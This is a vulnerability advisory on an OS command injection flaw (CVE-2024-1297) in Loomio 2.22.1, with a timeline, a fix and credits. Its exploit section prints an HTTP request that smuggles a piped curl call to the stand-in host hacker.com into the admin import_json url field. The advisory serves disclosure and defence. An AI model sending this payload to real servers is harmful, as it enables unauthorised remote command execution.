Loomio 2.22.1 - Code injection
Summary
| Name | Loomio 2.4.1 - Code injection |
| Code name | |
| Product | Loomio |
| Affected versions | Version 2.22.1 |
| State | Public |
| Release date | 2024-02-29 |
Vulnerability
| Kind | OS Command Injection |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| CVSSv3.1 Base Score | 7.2 |
| Exploit available | Yes |
| CVE ID(s) |
Description
Loomio version 2.22.1 allows executing arbitrary commands on the server. This is possible because the application is vulnerable to OS Command Injection.
Vulnerability
A command injection vulnerability has been identified in Loomio that allows an attacker to obtain RCE on the server. This was made possible by sending a malicious url to the server.
Exploit
A malicious URL is sent to the server.
POST /admin/groups/import_json HTTP/2.0
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: XX
url=|curl+'https://hacker.com/'
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2024-1297 to refer to this issue from now on.
System Information
-
Version: Loomio 2.22.1
-
Operating System: MacOS
Mitigation
An updated version of Loomio is available at the vendor page.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/loomio/loomio/
CVE addressed | Patch https://github.com/loomio/loomio/commit/6bc5429bfb5a9c7c811a4487d97ea54a8b23a0fa#diff-b9a7e6b3dfb0fd855c11198a7c53e6f6f90945f28c78cc5dbd960d04d5d28203
Timeline
2024-02-12
Vulnerability discovered.
2024-02-12
Vendor contacted.
2024-02-19
Vendor replied acknowledging the report.
2024-02-25
Vendor Confirmed the vulnerability.
2024-02-25
Vulnerability patched.
2024-02-29
Public Disclosure.
